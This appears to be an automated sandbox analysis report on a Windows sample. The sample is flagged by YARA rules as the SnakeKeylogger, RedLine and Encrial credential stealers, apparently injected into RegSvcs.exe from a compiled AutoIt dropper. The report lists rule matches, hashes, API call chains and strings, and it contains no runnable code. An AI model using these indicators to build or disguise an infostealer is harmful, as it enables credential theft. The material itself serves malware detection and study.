Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00623D19
Source: nfKqna8HuC.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: nfKqna8HuC.exe, 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fdb78bed-4
Source: nfKqna8HuC.exe, 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: eSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_44aeecd7-c
Source: nfKqna8HuC.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_97660607-4
Source: nfKqna8HuC.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_64025dcc-7

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00666606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00666606

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0065ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0065ACC5

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_006679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006679D3

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0064B043	0_2_0064B043
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00633200	0_2_00633200
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065410F	0_2_0065410F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006402A4	0_2_006402A4
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0062E3B0	0_2_0062E3B0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065038E	0_2_0065038E
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065467F	0_2_0065467F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006406D9	0_2_006406D9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0068AACE	0_2_0068AACE
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00654BEF	0_2_00654BEF
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0064CCC1	0_2_0064CCC1
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0062AF50	0_2_0062AF50
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00626F07	0_2_00626F07
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063B11F	0_2_0063B11F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006831BC	0_2_006831BC
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0064D1B9	0_2_0064D1B9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065724D	0_2_0065724D
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0064123A	0_2_0064123A
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006293F0	0_2_006293F0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006613CA	0_2_006613CA
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063F563	0_2_0063F563
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006296C0	0_2_006296C0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066B6CC	0_2_0066B6CC
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0068F7FF	0_2_0068F7FF
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006277B0	0_2_006277B0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006579C9	0_2_006579C9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063FA57	0_2_0063FA57
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00629B60	0_2_00629B60
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00633B70	0_2_00633B70
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00627D19	0_2_00627D19
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063FE6F	0_2_0063FE6F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00649ED0	0_2_00649ED0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00627FA3	0_2_00627FA3
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_014DFFB0	0_2_014DFFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A31438	2_2_02A31438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A31448	2_2_02A31448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A311A8	2_2_02A311A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_03028D70	2_2_03028D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_03023030	2_2_03023030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0302BA82	2_2_0302BA82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0302B828	2_2_0302B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_030222B0	2_2_030222B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_03028D60	2_2_03028D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0302F390	2_2_0302F390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_03023020	2_2_03023020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0302B818	2_2_0302B818

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: String function: 00646AC0 appears 42 times
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: String function: 0064F8A0 appears 35 times
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: String function: 0063EC2F appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times

Source: nfKqna8HuC.exe, 00000000.00000003.2062725234.0000000003E3D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs nfKqna8HuC.exe
Source: nfKqna8HuC.exe, 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs nfKqna8HuC.exe
Source: nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003C93000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs nfKqna8HuC.exe

Source: nfKqna8HuC.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.nfKqna8HuC.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
